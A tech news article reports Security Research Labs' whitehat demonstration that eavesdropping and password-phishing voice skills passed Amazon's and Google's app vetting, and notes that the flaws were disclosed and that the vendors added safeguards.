Amazon, Google Fail to Spot Voice Apps That Spy on Users

Amazon Echo Dot and Google Home Mini.
Amazon Echo Dot and Google Home Mini. (Image credit: Tom's Guide)

Malicious eavesdropping and phishing voice-assistant skills passed Amazon’s and Google’s vetting processes, according to Germany’s Security Research Labs. SRLabs told Ars Technica that its whitehat hackers successfully deployed a number of sly third-party apps to Alexa and Google Assistant systems.

These apps presented themselves as basic skills, such as horoscope reports or random number generators. Amazon and Google approved eight total SRLabs-designed apps of this nature: four for Alexa and four for Google Assistant.

Once made available, users could have enabled any of these skills with their voices. None required a separate download. But unlike third-party apps from reliable smart-home companies or weather services, the SRLabs apps used malicious tactics to abuse access.

"The privacy implications of an internet-connected microphone listening in to what you say are further reaching than previously understood," stated the SRLabs report. "Users need to be more aware of the potential of malicious voice apps that abuse their smart speakers."

The apps had different ways of harvesting private information. Because an unpronounceable character was placed at the end of the text-to-speech sequence, the eavesdropping apps kept on running even after completing their voice responses. 

That made users think that the apps had stopped recording, while in fact they continued to listen and record audio. The SRLabs developers even redirected the “Stop" command to create continuous eavesdropping activity.

For phishing, SRLabs designed skills that mimicked Alexa’s voice. The skills declared an error message, then asked users to speak their Amazon or Google passwords to run a necessary device update. 

The passwords were then sent to a third-party server, and anyone controlling that server could have used the passwords to try to log into the users' Amazon or Google  accounts.  (FYI, you should never be asked to say your password by a voice assistant.)

After sharing the security loopholes it discovered with Google and Amazon, SRLabs took down its apps. Google and Amazon both told Ars Technica that they had put mechanisms in place to prohibit similar apps from approval in the future. 

This report is just the latest in an seemingly ceaseless series of voice-assistant privacy concerns. At recent product-launch events, Amazon and Google have touted the strides they've made towards customer transparency, but the findings from SRLabs prove there are still worrisome privacy flaws.

There’s no evidence that real eavesdropping or phishing voice-assistant apps are an active threat, but the possibility of apps exploiting personal information exists. 

"It was always clear that those voice assistants have privacy implications—with Google and Amazon receiving your speech, and this possibly being triggered on accident sometimes," Fabian Bräunlein, senior security consultant at SRLabs, told Ars Technica. "We now show that, not only the manufacturers, but also hackers can abuse those voice assistants to intrude on someone's privacy."

Kate Kozuch

Kate Kozuch is the managing editor of social and video at Tom’s Guide. She covers smartwatches, TVs and audio devices, too. Kate appears on Fox News to talk tech trends and runs the Tom's Guide TikTok account, which you should be following. When she’s not filming tech videos, you can find her taking up a new sport, mastering the NYT Crossword or channeling her inner celebrity chef.